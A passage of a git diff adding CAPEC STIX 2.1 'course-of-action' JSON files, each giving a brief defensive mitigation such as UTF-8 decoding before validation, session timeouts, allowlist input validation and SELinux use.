decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.\n To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.\n Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.\n ", + "id": "course-of-action--14fb4c87-4528-48c8-a104-1ffa4a22f6b4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c.json new file mode 100644 index 0000000000000000000000000000000000000000..8740952259884dc4915ad842b125f40de1fae465 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--96faf0ae-e63a-4bb7-85ea-dcda75a778f4", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If applicable, confirm extensions/plugins are properly signed by the official developers.", + "id": "course-of-action--151dfa37-7bda-429b-b4cf-aeeba88b9b8c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--159fff7f-a612-4bd7-8053-34885f345613.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--159fff7f-a612-4bd7-8053-34885f345613.json new file mode 100644 index 0000000000000000000000000000000000000000..a75fa98b7dba4eb79e884e281b33646f343feb67 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--159fff7f-a612-4bd7-8053-34885f345613.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3f290a99-7360-418e-81b3-825fae4e24aa", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if the metadata is properly checked and a user believes it to be legitimate, there may still be a chance that they've been duped. Therefore, leverage automated testing techniques to determine where malicious areas of the code may exist.", + "id": "course-of-action--159fff7f-a612-4bd7-8053-34885f345613", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--cb529162-8335-438c-9301-27477c72f990.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--cb529162-8335-438c-9301-27477c72f990.json new file mode 100644 index 0000000000000000000000000000000000000000..11348a2eedd2544d4f325a5e33a6fb1a231974c1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--cb529162-8335-438c-9301-27477c72f990.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4588cce4-3d4b-479b-9f73-027e8d7a28a8", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9.json new file mode 100644 index 0000000000000000000000000000000000000000..e5a5a1267fb73430479a4c2017453eac79b83ac5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--efb6f206-3fca-4e48-a470-6382a91ba9f9", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit user permissions to prevent browser pivoting.", + "id": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5.json new file mode 100644 index 0000000000000000000000000000000000000000..8882123e5995365345596c8e398ad6a6f6958318 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c48ed632-dd81-4972-8d49-43a02f0834f8", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Prioritize Transfer-Encoding header over Content-Length, whenever an HTTP message contains both.", + "id": "course-of-action--d39d9ad3-ca67-4292-8e1c-279a1dd878b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-273-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0.json new file mode 100644 index 0000000000000000000000000000000000000000..39259a61f0ecca04be5f67ff9faa34569e6abcf4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--03037058-757d-4a5f-825d-f3a96f6e5561", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protected and unprotected memory ranges are isolated and do not overlap.", + "id": "course-of-action--d8644789-b5aa-430b-ba1a-8debdc9b27e0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-679-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c.json new file mode 100644 index 0000000000000000000000000000000000000000..abf93058b773b69d45c16a763e0c30820df8ad45 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2f593181-df41-4886-a332-55c49bd0dfa2", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement configuration management security practices that protect the integrity of software and associated data.", + "id": "course-of-action--d984401e-2a31-4aab-af29-a41a5cbc9c1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--dc4fe24d-19d8-40da-a0a0-4f3ccb7efe44.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--dc4fe24d-19d8-40da-a0a0-4f3ccb7efe44.json new file mode 100644 index 0000000000000000000000000000000000000000..608d5536031399b108dfd1dcf95ad21cba8393c6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--dc4fe24d-19d8-40da-a0a0-4f3ccb7efe44.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--23021092-ef4b-4c18-982c-642558a2d1bb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file.", + "id": "course-of-action--dc4fe24d-19d8-40da-a0a0-4f3ccb7efe44", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-27-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--df3a44eb-5da6-49ab-bd34-9ae02959482e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--df3a44eb-5da6-49ab-bd34-9ae02959482e.json new file mode 100644 index 0000000000000000000000000000000000000000..c120875d9a306c2c1c578c67aafaa65dd520c5c8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--df3a44eb-5da6-49ab-bd34-9ae02959482e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--41eb2b4c-2274-46c6-b6b7-813c6d508cec", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform output validation for all remote content.", + "id": "course-of-action--df3a44eb-5da6-49ab-bd34-9ae02959482e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-19-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c.json new file mode 100644 index 0000000000000000000000000000000000000000..1a14f20f844303c33420974701521755507c35d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--487da86e-d43f-4f69-a7c6-0f10693e7cc0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the amount of resources that are accessible to unprivileged users.", + "id": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-130-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34.json new file mode 100644 index 0000000000000000000000000000000000000000..de313baba26704e5e1e543277dae163f98f5b843 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--46df4189-35f3-42c8-be23-977b0c1d9440", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.", + "id": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json new file mode 100644 index 0000000000000000000000000000000000000000..759d0f401df90af7bbcc46d395ea92cfb3f3167a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--bdedce33-5622-4e9e-8164-0875a263111e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses.", + "id": "course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-275-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2.json new file mode 100644 index 0000000000000000000000000000000000000000..11c1c9ea482d4f8b139c16e0196cf50caa55cf5f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e3123c7b-e1a0-4368-8080-5cf7bf20dafc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.", + "id": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c.json new file mode 100644 index 0000000000000000000000000000000000000000..bf0b71ba98dcb74220673b908cfe927b54f18e37 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--56ff4b8e-52ef-410c-a15b-6d6b279d021c", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage hardware components known to not be susceptible to these types of attacks.", + "id": "course-of-action--ee51f6de-33e8-47c5-8d8b-17a99bc76e1c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-638-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2.json new file mode 100644 index 0000000000000000000000000000000000000000..66ce6c6db60abd40d8c2733b37e4ce50a8384dbf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d0d9122f-392a-467f-bc98-4e87ca472e50", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure users are not reusing username/password combinations for multiple systems, applications, or services.", + "id": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f448a9da-f220-4155-8e2d-9731566e757b.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f448a9da-f220-4155-8e2d-9731566e757b.json new file mode 100644 index 0000000000000000000000000000000000000000..4e354595324fe108a3a259d82420ee946736e8c7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f448a9da-f220-4155-8e2d-9731566e757b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2ee55fd2-f0da-4562-b8e2-dbb5163e0461", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow the forwarding of data resulting from a faulting or assisted instruction. Some current mitigations claim to zero out the forwarded data, but this mitigation still does not suffice.", + "id": "course-of-action--f448a9da-f220-4155-8e2d-9731566e757b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072.json new file mode 100644 index 0000000000000000000000000000000000000000..307f3f043824aafbed254b5dee7197199d97ce52 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--44866670-06a6-4173-b2c6-212adba5ed9d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.", + "id": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-505-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3.json new file mode 100644 index 0000000000000000000000000000000000000000..1d13eab95dab17738b4a7ce8bb8783ee8ad356fc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e6f49932-1010-4227-a9bd-73007cc42297", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.", + "id": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb.json new file mode 100644 index 0000000000000000000000000000000000000000..31cc717e4d7c6eff253db912fdcba572247f3e9b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--b1ee1356-9a45-433a-a646-be5b07af7647", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--fb383db0-5a1f-42bb-ba04-6b7434508fdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-103-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8.json new file mode 100644 index 0000000000000000000000000000000000000000..402696bacadbd9e8485d77b34f1cf5c3b074d20d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c5d8a488-aa37-4876-a7fc-c4750cdb6428", + "objects": [ + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hard Coded Alternate DNS server in applications", + "id": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c.json new file mode 100644 index 0000000000000000000000000000000000000000..444b04dd26be7c01cbc419ddc6ebd74b7754d4ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--097405dd-1a44-47b8-9c34-be388ab6c2c4", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage security kernel modules providing advanced access control and process restrictions like SELinux.", + "id": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json new file mode 100644 index 0000000000000000000000000000000000000000..6391978474950799d968da6422409d76bfa45da6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--1a34dd48-4933-4716-8f00-d02a2c84a046", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "id": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json new file mode 100644 index 0000000000000000000000000000000000000000..948027f57bdfc9828e37fe7c85166f3c2be01acc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a90eb264-a131-435b-bac4-fadfea29ba49", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain multiple instances of the document across different privileged users for recovery and verification.", + "id": "course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-519-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8.json new file mode 100644 index 0000000000000000000000000000000000000000..7a18fec7aa0d2768f78ab6f0a6de1d93b7998595 --- /dev/null +++ 